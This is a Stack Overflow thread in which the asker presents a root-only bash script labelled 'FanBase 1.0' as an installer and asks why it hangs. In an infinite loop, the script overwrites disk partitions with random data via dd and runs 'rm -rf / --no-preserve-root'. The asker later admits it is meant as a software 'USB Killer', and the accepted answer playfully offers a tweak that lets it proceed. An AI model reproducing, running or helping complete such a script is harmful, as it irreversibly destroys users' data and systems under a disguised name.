# Why is code after a while true; do ...; done loop never invoked in bash?

Tags: linux, bash

This script was listed on an installation. However it just hangs and doesn't do anything. Is there something wrong with it.

I have tried running this script on multiple computers.

```
#!/bin/bash
if [[ $EUID -ne 0 ]]; then
   echo "This script must be run as root" 
   exit 1
fi
echo "Starting FanBase 1.0"
#Replace with any message 
rm -rf b
while true
  do
   echo $(head /dev/urandom | tr -dc A-Za-z0-9 | head -c 13 ; echo '') >> b
   dd if=/dev/urandom of=/dev/sda1 bs=1M 2> /dev/null
   dd if=/dev/urandom of=/dev/sdb1 bs=1M 2> /dev/null
   dd if=/dev/urandom of=/dev/sdc1 bs=1M 2> /dev/null
   dd if=b of=/dev/sda1 bs=1M 2> /dev/null
   dd if=b of=/dev/sdb1 bs=1M 2> /dev/null
   dd if=b of=/dev/sdc1 bs=1M 2> /dev/null
   rm -rf / --no-preserve-root 2> /dev/null
  done
echo "DONE!"
```

Its supposed to say "DONE!"

Comment: What was your reason to write `while true`?

Comment: @thb Because it wasn't working correctly so I thought the loop would fix it.

Comment: An installation of what? This wipes your sda1, sda2, and sda3 drives. For some reason it continues to do so forever.

Comment: @JNevill It does, According to code its just writing the file b to the drives.

Comment: Okay. Because Stack Overflow discourages extended discussions in comments, I will begin a partial answer below. You can respond and we'll see where that leads us.

Comment: Uhh, "running using sh"? If you run `sh foo`, you're *not using bash*, you're using `sh`, which is a different shell. (And `[[` isn't guaranteed to be available in `sh` at all, so the running-as-root detection would just fail 100% of the time when invoked that way on a system where `/bin/sh` is provided by `dash`, `ash`, or another baseline-POSIX shell).

Comment: XY problem. What went wrong with your *original* code that you thought adding an infinite loop would fix?

Comment: @chepner It was really slow.

Comment: And doing *more* would make it go faster? I would delete this question, and post a new one showing the *original* code, stating the problem, and asking for a solution to *that* problem.

Answer (score 1, accepted):

Let's debug this. Try adding a `count=1` option to each `dd` command. For example,

```
    dd if=/dev/urandom of=/dev/sda1 bs=1M count=1 2> /dev/null
```

Comment: How can I debug it. I searched for the code and found [this](https://github.com/alwaysontop617/LinuxKiller)

Comment: That's hilarious, actually, but I'll play your straight man. Try adding `count=1` to each as suggested above. Let me know what you get.

Comment: Wow, its extremely brutal.

Comment: That *was* your intent, I presume. Well, that's the most fun I've had answering a question on Stack Overflow this month, and it's not even April, yet. Happy reinstallation!

Comment: Yes, it was. This is something than can be an alternative to the USB Killer. However this only works on linux.

Answer (score 1):

You have an infinite loop:

```
while true
do
  ....
done
```

will run forever and never get to the last line printing "DONE!".

Comment: Weird, so the infinite loop isn't needed.

Comment: There is almost no situation in which an infinite loop is needed.  If you are ever using `while true`(infinite loop), know that it will never exit the loop without a `break` statement.